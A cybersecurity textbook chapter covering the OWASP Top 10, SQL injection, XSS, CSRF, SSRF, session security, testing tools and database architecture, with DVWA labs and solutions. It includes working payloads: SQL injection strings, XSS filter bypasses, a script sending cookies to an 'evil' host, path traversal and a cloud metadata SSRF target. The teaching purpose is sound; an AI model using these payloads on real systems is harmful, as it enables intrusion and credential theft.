Chapter 10: Web Application Security

Chapter 10: Web Application Security#

“The web is the largest attack surface in history, and every website is a potential entry point.”

Learning Objectives#

After completing this chapter, you will be able to:

Explain the OWASP Top 10 vulnerability categories and the risk each represents.
Identify and exploit SQL injection, XSS, and CSRF in a controlled lab environment.
Explain broken authentication, insecure direct object references, and security misconfigurations.
Describe how HTTPS, CSP, HSTS, and SameSite cookies mitigate web attacks.
Test for injection vulnerabilities using manual and automated techniques.
Explain server-side request forgery (SSRF) and its impact in cloud environments.
Describe the role of a Web Application Firewall and its limitations.
Apply secure coding principles to prevent injection, XSS, and broken auth.

Key Terms#

OWASP: Open Web Application Security Project; produces the Top 10 vulnerability list.
SQL injection (SQLi): injecting SQL code via user input to manipulate a database query.
XSS: Cross-Site Scripting; injecting malicious JavaScript into a page viewed by other users.
CSRF: Cross-Site Request Forgery; tricking a browser into sending an authenticated request.
SSRF: Server-Side Request Forgery; tricking a server into making requests on the attacker’s behalf.
IDOR: Insecure Direct Object Reference; accessing another user’s data by changing a reference.
Broken auth: failures in session management, credential storage, or MFA enforcement.
CSP: Content Security Policy; HTTP header restricting sources of executable content.
HSTS: HTTP Strict Transport Security; forces HTTPS-only connections.
WAF: Web Application Firewall; filters malicious HTTP requests.
Prepared statement: a parameterised query that separates data from SQL structure.
Same-origin policy: browser policy restricting how documents from one origin access another.

10.1 How the Web Works: HTTP, Sessions, and the Same-Origin Policy#

Web attacks all exploit the mechanics of HTTP, so we begin there. The web runs on HTTP, a stateless request/response protocol (Chapter 3): a client sends a request (a method, a path, headers, and an optional body) and the server returns a response (a status code, headers, and a body). The common methods are GET (retrieve, parameters in the URL), POST (submit, parameters in the body), and PUT/DELETE/PATCH; the status codes group into 2xx success, 3xx redirect, 4xx client error (401 unauthorized, 403 forbidden, 404 not found), and 5xx server error. HTTPS is this same protocol inside a TLS tunnel (Chapter 2), which is why serving login forms over plain HTTP leaks credentials (Chapter 3).

Because HTTP is stateless, applications track a logged-in user with a session: the server issues a random session identifier stored in a cookie, and the browser returns it on every subsequent request. The security of the whole application therefore rests on that cookie, which is why cookies should be marked Secure (HTTPS only), HttpOnly (hidden from JavaScript, limiting XSS theft), and SameSite (limiting CSRF). Finally, browsers enforce the same-origin policy (SOP): script from one origin (scheme + host + port) cannot read responses from another, which is the fence that XSS breaks and that CORS selectively relaxes. These three ideas, the request/response model, session cookies, and the same-origin policy, are the stage on which every attack below plays out.

10.2 The OWASP Top 10#

The OWASP Top 10 [OWASPFoundation25] is the most widely cited reference for web application security risk. The current edition is 2025 (released at OWASP AppSec 2025); the 2021 edition [OWASPFoundation21] is still widely referenced. Both group vulnerabilities into risk categories based on incidence, exploitability, and impact. The full 2025 list with defenses appears below, and the sections that follow examine the most technically significant categories in depth.

Broken Access Control#

Broken access control is the top risk in OWASP 2021, reflecting how frequently authorization is implemented incorrectly. The application authenticates the user but fails to verify whether that user is authorized to perform a specific action or access a specific resource.

Insecure Direct Object References#

IDOR occurs when a resource identifier in a URL or parameter can be modified to access another user’s data without authorization. If GET /invoice?id=1234 returns a user’s invoice, changing the parameter to id=1235 should not return another user’s invoice without verifying ownership. Horizontal privilege escalation (accessing peer data) is the most common form; vertical privilege escalation (accessing admin data) is the most severe.

Forced Browsing and Path Traversal#

Forced browsing accesses pages or resources that are not linked from the application but are not protected by access controls. Path traversal (../../etc/passwd) exploits insufficient sanitization of file-path inputs to read arbitrary files on the server. A well-structured application uses canonical path validation and whitelists permitted directories.

The OWASP Top 10:2025#

The OWASP Top 10 is the industry’s consensus list of the most critical web-application security risks, refreshed every few years from data across millions of applications. The current edition is 2025, and it continues a shift in emphasis from individual coding bugs toward how software is designed, built, and operated.

A01:2025 Broken Access Control (still #1): users acting outside their intended permissions, including insecure direct object references (IDOR) and, now folded in, server-side request forgery (SSRF). Defense: deny by default, enforce authorization checks server-side on every request, use indirect object references, and validate outbound requests to block SSRF.
A02:2025 Security Misconfiguration (up from #5): insecure defaults, verbose errors, open cloud storage, missing hardening. Defense: harden and patch every component, disable defaults and verbose errors, automate secure configuration baselines, and lock down cloud storage.
A03:2025 Software Supply Chain Failures (new, expanding “Vulnerable and Outdated Components”): compromised dependencies, build tools, and CI/CD pipelines (Chapter 17). Defense: maintain a software bill of materials (SBOM), pin and verify dependencies, sign artifacts, and secure the build pipeline.
A04:2025 Cryptographic Failures (down from #2): weak or missing encryption of data in transit and at rest (Chapter 2). Defense: enforce TLS, encrypt sensitive data at rest with vetted algorithms (AES-GCM), and manage keys properly.
A05:2025 Injection (down from #3): SQL, command, LDAP, and cross-site scripting flaws where untrusted input is interpreted as code. Defense: use parameterized queries, validate input, encode output, and run with least-privilege accounts.
A06:2025 Insecure Design: flaws in the architecture itself, not fixable by better implementation alone. Defense: threat-model early, apply secure design patterns and reference architectures, and write security requirements before coding.
A07:2025 Authentication Failures: weak credentials, broken session management, missing MFA. Defense: require multi-factor authentication, enforce strong password and session policies, and rate-limit and lock out brute force.
A08:2025 Software or Data Integrity Failures: unverified updates and insecure deserialization. Defense: verify updates with digital signatures, avoid insecure deserialization, and add integrity checks in CI/CD.
A09:2025 Security Logging and Alerting Failures: inability to detect and respond to breaches (Chapter 12). Defense: log security-relevant events centrally, alert on suspicious activity, and test detection and response.
A10:2025 Mishandling of Exceptional Conditions (new): improper error handling, failing open, and logic errors under abnormal conditions. Defense: fail securely (closed), handle errors explicitly without leaking details, and test abnormal and error paths.

The sections that follow examine the highest-impact of these in depth, with hands-on practice on the Damn Vulnerable Web Application (DVWA), and the chapter’s defenses map back to this list.

10.3 Injection Attacks#

Introducing SQL Injection#

SQLi is caused by constructing SQL queries using string concatenation with user-supplied input. The canonical fix is parameterised queries (prepared statements), which separate the SQL structure from the data and make injection structurally impossible.

Error-Based SQLi#

Error-based SQLi submits syntax that causes the database to return an error message containing internal information (table names, column names, version strings). Many production applications display database errors to users, providing free intelligence to attackers.

Union-Based SQLi#

A UNION SELECT appended to the original query extracts data from other tables. The attacker first determines the number of columns in the original query (by incrementing ORDER BY N until an error occurs), then constructs a UNION SELECT with matching column count to extract target data.

Cross-Site Scripting#

XSS injects malicious JavaScript into content served to other users’ browsers.

Reflected XSS#

Reflected XSS occurs when user input is immediately echoed in the response without encoding. The attacker crafts a URL containing a payload (<script>document.location='https://evil/?' + document.cookie</script>) and sends it to a victim. The victim’s browser executes the script in the context of the trusted site, stealing the session cookie.

Stored XSS#

Stored XSS persists the payload in the application’s database (a comment, a username, a profile field). Every user who views the infected page executes the script. Stored XSS is more dangerous because it does not require the attacker to send a crafted link; the payload runs automatically.

DOM-Based XSS#

DOM-based XSS occurs when client-side JavaScript writes attacker-controlled data to the DOM without sanitization. The payload never reaches the server; it is injected and executed entirely in the browser. Classic sink functions: innerHTML, eval(), document.write().

Cross-Site Request Forgery#

CSRF tricks an authenticated user’s browser into sending a forged request to a target application. Because the browser automatically includes session cookies, the forged request appears legitimate. A hidden form on a malicious page that submits POST /transfer?amount=1000&to=attacker to the banking site executes if the user is logged in and has no CSRF protection.

CSRF Mitigations#

The primary mitigation is a synchronizer token: a secret value included in each form that the server validates before processing the request. The SameSite cookie attribute (Strict or Lax) prevents cookies from being sent with cross-origin requests, defeating CSRF for modern browsers.

Server-Side Request Forgery#

SSRF causes the server to make HTTP requests on behalf of the attacker. If an application fetches a user-specified URL, an attacker can point it at http://169.254.169.254/ (the AWS Instance Metadata Service) to extract IAM credentials, or at internal services (http://localhost:8080/admin) not accessible externally. SSRF is particularly severe in cloud environments where the metadata service exposes credentials for the host machine’s IAM role.

10.4 SQL Injection in Depth#

Database Models: Traditional and Modern#

Before dissecting SQL injection it helps to know what kind of database is under attack, because the data model shapes both the query language and the injection technique. The traditional workhorse is the relational database management system (RDBMS), such as MySQL, PostgreSQL, Microsoft SQL Server, and Oracle, which stores data in tables of rows and columns, enforces a fixed schema, guarantees ACID transactions, and is queried with Structured Query Language (SQL). SQL injection is the classic attack against this model.

Modern applications increasingly use non-relational (NoSQL) and specialized databases, each with its own query interface and therefore its own injection risk:

Key-value stores (Redis, Amazon DynamoDB) map a key to an opaque value for fast caching and session storage.
Document stores (MongoDB, Couchbase) hold schema-flexible JSON-like documents and are queried with operators rather than SQL, which gives rise to NoSQL injection (for example smuggling a MongoDB operator such as $ne or $gt through unvalidated input).
Wide-column stores (Apache Cassandra, HBase) spread tables across many nodes for very large workloads.
Graph databases (Neo4j) model entities and their relationships and are queried with graph languages such as Cypher, which can be injected just as SQL can.
Vector databases (Pinecone, Milvus, pgvector) store high-dimensional embeddings for similarity search and underpin AI retrieval systems; their growth brings new concerns such as embedding inversion and prompt injection through retrieved content (Chapter 17).
Time-series databases (InfluxDB, TimescaleDB) optimize for timestamped metrics and telemetry.

The unifying lesson is that injection is not unique to SQL. Any time untrusted input is concatenated into a query, whether SQL, a MongoDB filter, a Cypher statement, or an LDAP or operating-system command, the same flaw appears. SQL injection is simply the most studied instance, and the defenses developed for it (parameterized queries, strict input validation, and least-privilege database accounts) generalize to every data model. The remainder of this section examines SQL injection in depth as the archetype.

SQL injection (SQLi) remains the archetypal injection flaw (A05): it occurs when user input is concatenated into a SQL query so that input becomes code. If a login query is built as SELECT * FROM users WHERE name='$u' AND pass='$p', supplying the username admin' -- comments out the password check, and supplying ' OR '1'='1 makes the WHERE clause always true. SQLi comes in several flavors:

In-band / UNION-based: the attacker uses UNION SELECT to append attacker-chosen columns to the result, reading arbitrary tables (' UNION SELECT username, password FROM users -- ).
Error-based: coaxing the database into error messages that leak data.
Blind boolean-based: when no data or error is returned, the attacker asks true/false questions and infers answers from page differences (' AND 1=1 -- versus ' AND 1=2 -- ).
Blind time-based: inferring answers from deliberate delays (' AND SLEEP(5) -- ).

The automated tool sqlmap systematizes all of these. The defense is unambiguous and complete: parameterized queries (prepared statements) that send code and data on separate channels so input can never be parsed as SQL, reinforced by least-privilege database accounts, input validation, and stored procedures. String concatenation of untrusted input into a query is the root cause and must be eliminated, not filtered.

Hands-On Lab: SQL Injection on DVWA (with solution)

On the Damn Vulnerable Web Application (DVWA) in a local lab, set security to low and open the SQL Injection page, which runs SELECT first_name, last_name FROM users WHERE user_id = '$id'.

Confirm the flaw: enter 1' OR '1'='1 -> the page returns every user, proving the input breaks out of the quoted string.
Enumerate columns: 1' ORDER BY 2 -- succeeds but ORDER BY 3 -- errors, so the query returns two columns.
Extract credentials (UNION): 1' UNION SELECT user, password FROM users -- returns each user’s name and their MD5 password hash, which can then be cracked offline (Chapter 2 or Chapter 9).
Raise the difficulty: at medium, DVWA uses mysqli_real_escape_string and a drop-down, but the id parameter is numeric and unquoted, so injection via the intercepted POST (using Burp/ZAP) still works with payloads like 1 UNION SELECT user,password FROM users -- (no quotes needed).

Why it works and how to fix it: the vulnerable code concatenates $id directly into the query; DVWA’s impossible level uses a prepared statement (PDO with bound parameters) plus an is_numeric check, which defeats every payload above. Write up the exact payloads that worked at low and medium and explain why the parameterized impossible version cannot be injected.

10.5 Cross-Site Scripting (XSS)#

Cross-site scripting injects attacker JavaScript into pages other users view, breaking the same-origin policy to steal session cookies, perform actions as the victim, or deface content. There are three types:

Reflected XSS: the malicious script is in the request (a URL parameter) and reflected straight back in the response, delivered by tricking the victim into clicking a crafted link.
Stored (persistent) XSS: the script is saved on the server (a comment, profile, or message) and served to every visitor, the most damaging because it needs no per-victim lure.
DOM-based XSS: the vulnerability is entirely client-side, where JavaScript writes untrusted input into the page (innerHTML) without encoding.

The defense is context-aware output encoding (HTML-encode untrusted data so <script> becomes harmless text), plus input validation, a strong Content Security Policy (CSP) that blocks inline and third-party script, and HttpOnly cookies so that even successful XSS cannot read the session cookie. Encoding on output, not just filtering on input, is the reliable fix because the safe representation depends on where the data is placed (HTML body, attribute, JavaScript, URL).

Hands-On Lab: Reflected and Stored XSS on DVWA (with solution)

On DVWA at low security:

Reflected: the XSS (Reflected) page echoes the name parameter. Enter <script>alert(document.cookie)</script> -> the script executes and pops the cookie, proving arbitrary script runs in the victim’s session. A real attacker would replace the alert with code that sends document.cookie to an attacker server.
Stored: the XSS (Stored) guestbook saves your message. Submit <script>alert('stored XSS')</script> -> it fires for everyone who later views the page, demonstrating persistence.
Medium bypass: at medium, DVWA strips <script> with a naive str_replace. Bypass it with a payload that does not contain that exact tag, for example an event handler, <img src=x onerror=alert(document.cookie)>, or case/nesting tricks such as <SCRIPT> or <scr<script>ipt> (which becomes <script> after the inner one is removed). This shows why blacklist filtering fails.

Why it works and how to fix it: the page inserts input into HTML without encoding. DVWA’s impossible level applies htmlspecialchars() (output encoding) so the payload renders as inert text. Record the payloads that worked at low and the bypass at medium, and explain why output encoding plus a CSP defeats them while blacklist filtering does not.

10.6 Broken Access Control, CSRF, SSRF, and Other High-Impact Flaws#

Beyond injection, several classes dominate real breaches. Broken access control (A01) is the failure to enforce what an authenticated user may do. Its commonest form is the insecure direct object reference (IDOR): changing /account?id=123 to id=124 and seeing someone else’s data because the server checks authentication but not authorization. Server-side request forgery (SSRF), now folded under A01, tricks the server into making requests the attacker chooses (for example to internal-only addresses or a cloud metadata endpoint), turning the server into a proxy past the firewall. Both are fixed by server-side authorization checks on every object and by validating and allow-listing outbound request targets.

Cross-site request forgery (CSRF) abuses the fact that browsers auto-attach cookies: a malicious page makes the victim’s browser send an authenticated request (transfer money, change email) without the victim’s intent. The defenses are unpredictable anti-CSRF tokens tied to the session and SameSite cookies. Other recurring flaws include command injection (untrusted input passed to a shell, fixed by avoiding shells and using parameterized APIs), insecure file upload (uploading a web shell, fixed by validating type and storing outside the web root), XML external entity (XXE) injection (fixed by disabling external entities), and insecure deserialization (A08, fixed by avoiding native deserialization of untrusted data). The pattern across all of them is the chapter’s thesis: never trust input, enforce authorization server-side, and fail securely.

10.7 Authentication and Session Management#

Broken Authentication#

Broken authentication encompasses: weak password policies, missing lockout after failed login attempts (enabling brute force), credential stuffing (automating breach-database credentials against the target), password reset flows that can be bypassed, and session tokens that are too short or predictable.

Secure Password Storage#

Passwords must never be stored in plaintext or as simple hashes. Use a modern salted, memory-hard password-hashing scheme such as Argon2id or bcrypt with a sufficient cost factor, following your organization’s standards. NIST SP 800-63B focuses on password-verifier requirements (for example, checking new passwords against breach corpora and not imposing arbitrary composition or periodic-reset rules) rather than naming a single preferred hashing algorithm.

Session Management Best Practices#

Session tokens must be generated with a cryptographically secure random number generator (CSPRNG), be at least 128 bits of entropy, be invalidated on logout, have an absolute timeout, and be transmitted only over HTTPS. The HttpOnly attribute prevents JavaScript access to session cookies; the Secure attribute ensures they are sent only over TLS.

Authentication, Sessions, and the Insufficient-Session-Expiration Flaw#

Authentication and session-management failures (A07) are perennial. Beyond weak passwords and missing MFA (Chapter 11), the session itself is a frequent weak point: session IDs must be long, random, regenerated on login (to prevent session fixation), transmitted only over HTTPS, and invalidated on logout and after inactivity. A specific, often-overlooked weakness is insufficient session expiration: when a session token remains valid for too long, or is not destroyed on logout, a token captured or left on a shared computer keeps working long after it should. The fix is short idle and absolute timeouts, server-side session invalidation on logout (not merely deleting the client cookie), and rotating tokens on privilege changes. The lesson is that authenticating a user once is not enough; the session that represents that authentication must be protected throughout its lifetime, which is why session management appears explicitly in the OWASP Top 10.

10.8 Security Misconfigurations#

Security misconfiguration ranked fifth in OWASP Top 10:2021 and rose to second in the 2025 edition, and it remains extremely common. Examples: default credentials left on administrative interfaces, unnecessary features enabled (debug mode, unnecessary HTTP methods), verbose error messages exposing stack traces, directory listing enabled, missing security headers (CSP, HSTS, X-Frame-Options).

Security Headers#

Header	Purpose
Content-Security-Policy	Restrict sources of scripts, styles, and media
Strict-Transport-Security	Force HTTPS for the defined period
X-Frame-Options	Prevent clickjacking via iframe
X-Content-Type-Options: nosniff	Prevent MIME-type sniffing
Referrer-Policy	Control referrer header on cross-origin requests
Permissions-Policy	Restrict browser features (camera, mic, geolocation)

10.9 The Web-Application Testing Toolkit#

Putting offense and defense together requires tooling, and a few tools are ubiquitous. Burp Suite and OWASP ZAP are intercepting proxies that sit between browser and server so a tester can read, modify, and replay every request, the core of manual web testing and of DAST (above); ZAP is free and open source. sqlmap automates SQL injection discovery and exploitation; nikto scans for known server issues; and dirb/gobuster/feroxbuster brute-force hidden paths (Chapter 8). For safe, legal practice, deliberately vulnerable targets exist: DVWA (used in the labs above), OWASP WebGoat (a guided lessons app), and OWASP Juice Shop (a modern single-page app). These let learners exploit every flaw in this chapter in an environment they are authorized to attack, which is the only ethical way to build the skill.

Knowledge Check

Why does a parameterized query stop SQL injection where input filtering does not?
Distinguish reflected, stored, and DOM-based XSS, and name the cookie flag that limits cookie theft via XSS.
What is an IDOR, and what single control prevents it?

Answers: (1) A prepared statement sends the query structure and the data on separate channels, so user input is always treated as a value and can never be parsed as SQL; filtering tries to enumerate bad input and is routinely bypassed. (2) Reflected XSS is echoed from the request, stored XSS is saved server-side and served to all viewers, DOM-based XSS is introduced entirely client-side; HttpOnly keeps JavaScript from reading the session cookie. (3) An insecure direct object reference exposes another user’s object by changing an identifier; the fix is a server-side authorization check on every object access, not just authentication.

10.10 Application Security Testing: SAST, DAST, IAST, and DevSecOps#

Finding the vulnerabilities of this chapter before attackers do is the job of application security testing, and the methods differ by when and how they look. The two foundational, complementary techniques are SAST and DAST.

Static Application Security Testing (SAST) analyzes source code, bytecode, or binaries at rest, early in development, often inside the developer’s IDE or as a commit/CI check. It walks the code (typically over an abstract syntax tree, using the visitor pattern described in Chapter 17) to flag insecure patterns. Its strength is pinpointing the exact vulnerable line before it ships; its weakness is that, lacking runtime context, it produces more false positives.
Dynamic Application Security Testing (DAST) tests a running application from the outside in, like an ethical hacker, probing URLs, parameters, and APIs (OWASP ZAP, used in this book’s labs, is a DAST tool). It runs later, on a staging or pre-production deployment. Its strength is confirming that a flaw is actually exploitable (fewer false positives); its weakness is that it cannot point to the offending line and needs a fully built, running app.

Two further methods fill the gap between them. IAST (Interactive AST) instruments the running application to combine DAST-style execution with SAST-style code visibility, and RASP (Runtime Application Self-Protection) embeds in the production app to detect and block attacks live. The professional consensus is not to choose but to layer them in a DevSecOps pipeline: run SAST early so developers fix flaws as they type, then DAST (and IAST) in staging to verify exploitability and catch runtime misconfigurations, then RASP and a WAF in production. As the WAF section of this chapter notes, a web application firewall is the runtime gatekeeper that filters SQL injection, cross-site scripting, and automated bot traffic, valuable, but a compensating control that complements secure code rather than replacing the testing above.

Knowledge Check

What does SAST examine and when, versus DAST, and why does SAST tend to produce more false positives?
Why is “SAST or DAST” the wrong framing?
Which design pattern do static analyzers use to traverse a program’s syntax tree, and where else does it appear in this book?

Answers: (1) SAST scans source/bytecode/binaries at rest early in development and lacks runtime context, so it over-reports; DAST probes a running app from the outside later in the lifecycle and confirms exploitability. (2) They cover different blind spots, code-level flaws versus runtime/exploitability, so a layered DevSecOps approach uses both. (3) The visitor pattern (Chapter 17), which traverses the abstract syntax tree applying checks at each node.

10.11 Web Application Firewalls and Their Limits#

A WAF inspects HTTP requests and blocks or logs those matching malicious patterns. It provides a useful additional layer against known attack signatures and automated scanners, and can virtually patch a vulnerable application while a permanent fix is being developed.

WAF Bypass Techniques#

WAFs can be bypassed via encoding tricks (double URL-encoding, Unicode variants), HTTP request smuggling, case variation, and payload fragments that individually pass rules but combine to an attack. A WAF is not a substitute for secure code; it is a compensating control for vulnerabilities that cannot be immediately remediated.

SAST / DAST / IAST / RASP: static, dynamic, interactive, and runtime application security testing/protection.
DevSecOps: integrating security testing throughout the software development lifecycle.

10.12 The OWASP API Security Top 10#

The OWASP Top 10 earlier in this chapter targets web applications rendered for human users. Modern systems are increasingly driven by application programming interfaces (APIs) consumed by mobile apps, single-page front ends, and other services, and these have a distinct risk profile that OWASP tracks in a separate list, the OWASP API Security Top 10 (2023 edition).

Rank	Risk
API1	Broken Object Level Authorization (BOLA)
API2	Broken Authentication
API3	Broken Object Property Level Authorization
API4	Unrestricted Resource Consumption
API5	Broken Function Level Authorization (BFLA)
API6	Unrestricted Access to Sensitive Business Flows
API7	Server-Side Request Forgery (SSRF)
API8	Security Misconfiguration
API9	Improper Inventory Management
API10	Unsafe Consumption of APIs

The dominant theme is authorization, not injection. The top risk, BOLA, occurs when an endpoint accepts an object identifier from the client and returns or modifies that object without checking that the caller is allowed to access it, so changing an identifier in the request (for example from /accounts/123 to /accounts/124) exposes another user’s data. BFLA is its function-level counterpart, where a user reaches an administrative operation that should be off limits. Broken Object Property Level Authorization merges the older Excessive Data Exposure and Mass Assignment problems, where an API returns or accepts fields it should not. The remaining items reflect the realities of running many fast-changing endpoints: resource exhaustion, business flows abused through automation, SSRF from server-side fetches, misconfiguration, undocumented or forgotten endpoints (shadow and zombie APIs) under Improper Inventory Management, and blind trust in data from third-party APIs. The defenses are consistent: enforce object-level and function-level authorization on the server for every request, validate and restrict which properties a client may read or write, apply rate and resource limits, maintain an accurate inventory of every API and version, and treat data received from upstream APIs as untrusted input.

10.13 Database Systems in Depth: Engines, Replication, and Security#

The primer in Section 10.4 distinguished relational databases from the modern non-relational families. This section goes deeper into how production database systems are built and operated, because their architecture (engines, schemas, and replication) directly shapes both performance and the attack surface.

Relational Database Management Systems#

A relational database management system (RDBMS) stores data in tables of rows and columns, enforces a schema, guarantees ACID transactions (atomicity, consistency, isolation, durability), and is queried with SQL. The widely used systems differ mainly in licensing, extensibility, and ecosystem:

PostgreSQL is an open-source, standards-compliant object-relational system known for extensibility (custom types and extensions such as PostGIS and pgvector) and strong concurrency through multiversion concurrency control (MVCC).
MySQL is the most widely deployed open-source RDBMS, now owned by Oracle, built around pluggable storage engines (described below) and popular in web stacks.
MariaDB is a community-developed fork of MySQL, created in 2009 by MySQL’s original author after Oracle’s acquisition of Sun (and thus of MySQL); it stays largely drop-in compatible while adding its own engines and features.
Oracle Database is a feature-rich commercial RDBMS with the PL/SQL procedural language, common in large enterprises.
Microsoft SQL Server is Microsoft’s commercial RDBMS with the T-SQL dialect, tightly integrated with the Windows and Azure ecosystems.
IBM Db2 is IBM’s commercial RDBMS family for enterprise and mainframe workloads.
Amazon Aurora is a cloud-native RDBMS that is wire-compatible with MySQL and PostgreSQL but re-engineers the storage layer: it separates compute from a distributed storage service that automatically keeps six copies of the data across three Availability Zones, backs up continuously to object storage, and supports up to fifteen low-lag read replicas. It shows how cloud databases trade the single-server model for a fault-tolerant, horizontally scaled design.

Non-Relational, In-Memory, and Graph Databases#

Non-relational (NoSQL) systems, introduced in Section 10.4, trade strict schemas and joins for scale and flexibility, and come in key-value, document, wide-column, vector, and time-series families. Two specialized classes deserve their own treatment.

In-memory databases keep the working dataset in RAM rather than on disk, which removes disk latency and delivers microsecond reads, at the cost of volatility (RAM is lost on power failure) and higher memory cost. Examples are Redis and Memcached (caching, sessions, and queues) and SAP HANA (analytics). Durability is added back through periodic snapshots, append-only logs, or replication. The security implication is twofold: sensitive data sits in memory, a target for memory scraping, and several in-memory stores historically shipped with no authentication and were exposed directly to the internet, which led to mass compromise.

Graph databases store data as nodes (entities), edges (relationships), and properties, and query relationships directly rather than through expensive joins. Examples are Neo4j (queried with Cypher) and Amazon Neptune. They excel at fraud detection, recommendations, and social networks, and, notably for this book, at security analysis: tools such as BloodHound (Chapter 9) load Active Directory relationships into a graph database to find the shortest attack path to domain administrator.

Schemas: Schema-on-Write versus Schema-on-Read#

A relational database uses schema-on-write: the structure (tables, columns, types, and constraints) is defined in advance, and the database rejects data that does not fit, which enforces consistency and validation at the cost of flexibility. Many NoSQL systems instead use a loose, flexible, or undefined schema (schema-on-read): records in the same collection may have different fields, and meaning is imposed by the application when it reads the data. Loose schemas make rapid iteration and heterogeneous data easy, but they shift validation to the application and introduce security risk: unexpected or attacker-controlled fields can be injected (NoSQL injection and mass assignment, where a client sets fields it should not), and inconsistent records can break assumptions elsewhere. The defense is to validate and constrain input even when the database does not, for example with application-level schemas and allowlisted fields.

Database Kernels and Engines#

Underneath the SQL or API surface, the database engine is the core software that actually stores data, builds indexes, plans and executes queries, and enforces transactions, concurrency (through locking and MVCC), and durability (through write-ahead logging). The term database kernel refers to this core; Oracle, for example, speaks of its kernel. A key architectural idea is the pluggable storage engine: MySQL and MariaDB let each table choose its engine, and the choice changes behavior. InnoDB, the default, is transactional and ACID-compliant with row-level locking and crash recovery; the older MyISAM is faster for read-only workloads but lacks transactions and uses table-level locking; in-memory engines hold tables in RAM. Other systems embed specialized engines (for example RocksDB and WiredTiger underpin various databases). The engine choice matters for security because it determines whether operations are atomic and recoverable, how encryption at rest (transparent data encryption) is applied, and how audit logging behaves.

Replication: Synchronous versus Asynchronous#

Replication copies data from a primary (writer) to one or more replicas for availability, durability, and read scaling. The crucial distinction is when the primary considers a write complete:

Synchronous replication: the primary waits until at least one replica acknowledges the write before committing. No acknowledged data is lost if the primary fails (a recovery point objective of zero), but every commit pays the round-trip latency, so synchronous replication is normally used within a region or across nearby Availability Zones (Aurora’s storage layer and RDS Multi-AZ work this way).
Asynchronous replication: the primary commits immediately and streams changes to replicas in the background. This is fast and scales across long distances, but a failure can lose the most recent writes (replication lag), and replicas can serve slightly stale data. It is the usual choice for cross-region disaster recovery and read scaling.

The trade-off is the classic one between consistency and latency: synchronous favors safety, asynchronous favors performance.

Read (Only) Replicas#

A read replica is a copy of the database that serves read-only queries, offloading reporting and traffic from the primary so the system scales reads horizontally. Most read replicas use asynchronous replication, so they are eventually consistent and may lag the primary by milliseconds to seconds, which is acceptable for analytics and search but not for read-after-write guarantees. Many platforms can promote a read replica to become a new primary, which doubles as a disaster-recovery and migration mechanism. Aurora replicas are a special case: because all replicas share the same distributed storage volume, their lag is typically under 100 milliseconds.

Cloud Database Instance Classes#

In a managed cloud database you do not choose a physical server; you choose an instance class that fixes the CPU, memory, and scaling behavior, and that choice has real security consequences, mostly for availability and cost. The main families are:

Burstable classes (for example AWS db.t3 and db.t4g, or Azure B-series) provide a low baseline of CPU and accumulate CPU credits while idle that let them burst to full performance for short periods. They are inexpensive and suit development, test, and light or spiky workloads.
Memory-optimized classes (for example AWS db.r6g and db.x2g, or Azure E and M series) offer a high ratio of RAM to CPU for large working sets, in-memory databases, caching, and heavy analytical queries.
Serverless (Aurora Serverless v2, Azure SQL Database serverless) removes the fixed instance entirely: capacity scales automatically with load between a configured minimum and maximum, is billed per unit of use (Aurora measures this in Aurora Capacity Units, each about 2 GiB of memory, scaling in 0.5-unit steps), and can scale down or pause when idle.

The security property at stake here is mostly the A in the CIA triad, availability, together with a newer concern, cost as an attack surface.

Burstable. Strength: low cost makes it easy to run isolated test and staging databases instead of sharing production. Weakness: it is fragile under load, because performance depends on CPU credits, so an attacker (or even an accidental spike) can deliberately exhaust the credits and throttle the database, a cheap denial-of-service against an availability-sensitive component; in burst-unlimited mode the same pressure silently inflates the bill (a denial-of-wallet attack). Security-critical functions such as logging, monitoring, and authentication should not run on a credit-starved burstable instance. Defenses are to alarm on a low CPU-credit balance, cap unlimited bursting, and use a non-burstable class for production.
Memory-optimized. Strength: large memory headroom resists resource-exhaustion attacks and sustains heavy query loads, which improves availability, and it is the right home for in-memory databases and large caches. Weakness: more sensitive data is resident in RAM for longer, which raises the value of memory scraping and, on shared multi-tenant hardware, of speculative-execution side channels (the Spectre and Meltdown class); large plaintext caches also widen confidentiality exposure if the host is compromised. Defenses are encryption in use where available, strong tenant isolation, and keeping secrets out of cacheable query paths.
Serverless. Strength: automatic elasticity absorbs legitimate spikes and a degree of volumetric load, improving availability and resilience, and scaling toward zero when idle shrinks the running attack surface and the cost. Weakness: that same elasticity is the textbook target of a denial-of-wallet (economic denial-of-sustainability) attack, in which an adversary generates load purely to drive autoscaling and run up the bill; auto-scaling can also mask a slow attack as ordinary growth, and cold starts add latency. Defenses are to set a hard maximum capacity, configure budget and anomaly alarms, rate-limit and authenticate the front end so only legitimate traffic reaches the database, and place a cache or queue in front to dampen spikes.

The cross-cutting lesson is that in the cloud the instance class is a security decision, not just a performance one: it sets the ceiling for availability under attack and decides whether a flood becomes an outage, a throttle, or a surprise invoice. Right-sizing, hard capacity caps, and cost-anomaly alarms are therefore security controls.

Attacks and Defenses#

Databases are the ultimate target of most breaches because they hold the data, and the systems above add their own exposure.

Common attacks include SQL and NoSQL injection (Sections 10.3 and 10.4); weak, default, or shared credentials and the public exposure of databases (unauthenticated Redis, MongoDB, and Elasticsearch instances have been mass-compromised and held for ransom); excessive privileges that turn one compromised account into full access; unencrypted connections that allow sniffing; theft of backups and snapshots; privilege escalation and data exfiltration; and ransomware against the data store. Replication adds its own surface: an unencrypted or unauthenticated replication channel can be sniffed or tampered with in transit, a compromised replica can leak the entire dataset, stale reads from a lagging replica can be abused, and the ability to promote a replica is a path to takeover if it is not tightly controlled.

Core defenses are to apply least privilege and strong, unique authentication (ideally with a secrets manager and MFA for administrators); never expose a database directly to the internet (place it in a private subnet behind security groups and a bastion or proxy); encrypt data in transit with TLS and at rest with transparent data encryption; use parameterized queries and server-side input validation to stop injection; keep engines patched; enable auditing and database activity monitoring; and take tested, immutable, offline backups. For replication specifically, encrypt and authenticate the replication channel, restrict and monitor which principals can create or promote replicas, treat every replica as holding production data with the same hardening as the primary, and alert on abnormal replication lag or integrity failures.

Chapter Summary#

This chapter examined the security of web applications. It began with how the web works through HTTP, sessions, and the same-origin policy, then organized the major risks around the OWASP Top 10. It covered injection in general and SQL injection in depth, cross-site scripting, and the high-impact class of broken access control along with CSRF and SSRF, followed by authentication and session management and security misconfigurations. It then turned to defense and tooling, including the web-application testing toolkit, application security testing with SAST, DAST, IAST, and DevSecOps, and the role and limits of web application firewalls. The throughline is that most web compromises trace back to a few recurring flaws and that secure design, input and output handling, and layered testing are far more durable than a single perimeter control.

Why This Matters#

